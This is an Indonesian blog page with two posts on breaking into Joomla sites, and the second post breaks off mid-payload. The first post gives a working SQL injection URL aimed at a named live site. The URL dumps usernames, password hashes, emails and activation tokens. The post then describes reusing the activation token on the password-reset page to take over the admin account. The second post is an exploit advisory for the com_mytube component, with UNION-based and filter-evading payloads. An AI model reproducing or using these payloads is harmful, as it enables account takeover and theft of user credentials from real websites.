Postingan

Menampilkan postingan dari Maret, 2010

Cracking Password Joomla

Ini adalah sebuah trik dengan memaksimalkan exploit dari component joomla yang vuln agar dapat masuk sebagai admin di situs berbasis cms joomla.
Mungkin kalian pernah bingung bagaimana cara crack hash joomla,, uda crack kesana kesini namun tidak mendapatkan hasil, berikut saya ada sedikit trik untuk mengakalinya. Yaitu dengan cara reset password dan memasukan token, token disini bukan tanda ' ya,, disini kita memaksimalkan exploit dari component joomla yang vuln.



misal anda menggunakan exploit com_mytube

http://www.malaysia-instinct.com/english/index.php?view=videos&type=member&user_id=0+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat%28username,0x3a,password,0x3a,email,0x3a,activation,0x3c62723e%29,14,15,16,17,18,19,20,21,22,23,24,25,26+from+jos_users--&option=com_mytube&Itemid=r3m1ck

akan muncul username , password , email dan activation .
disini kita akan menggunakan email dan activation nya.
pertama buka halaman reset passwordnya dengan menambahkan…

Joomla component com_mytube (user_id) Blind SQLi Vulnerability

[!]========================================[!]

#Joomla Component com_mytube SQLi Vulnerability (id)
#Author     : r3m1ck(r3m1ck@hackermail.com)
#Homepage: http://www.r3m1ck.uni.cc/
#Date     : 6 Desember, 2009

[!]========================================[!]

[ Software Information ]

#Application   : MyRemote Video Gallery
#version       : 1.0 Beta
#Developer     : Jomtube Team
#License       : GPL            type  : Non-Commercial
#Date Added    : Aug 24, 2009
#Download      : http://joomlacode.org/gf/download/frsrelease/10834/42943/com_mytube_1.0.0_2009.08.02.zip

[!]========================================[!]
[ Vulnerable File ]

http://127.0.0.1/[path]/index.php?view=videos&type=member&user_id=[U3D-Crew]&option=com_mytube&Itemid=r3m1ck

[ XpL ]

69+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat
(username,0x3a,password,0x3a,email,0x3c62723e),14,15,16,17,18,19,20,21,
22,23,24,25,26+from+jos_users--&option=com_mytube&Itemid=r3m1ck

69/**/AND/**/1=2/**/UN…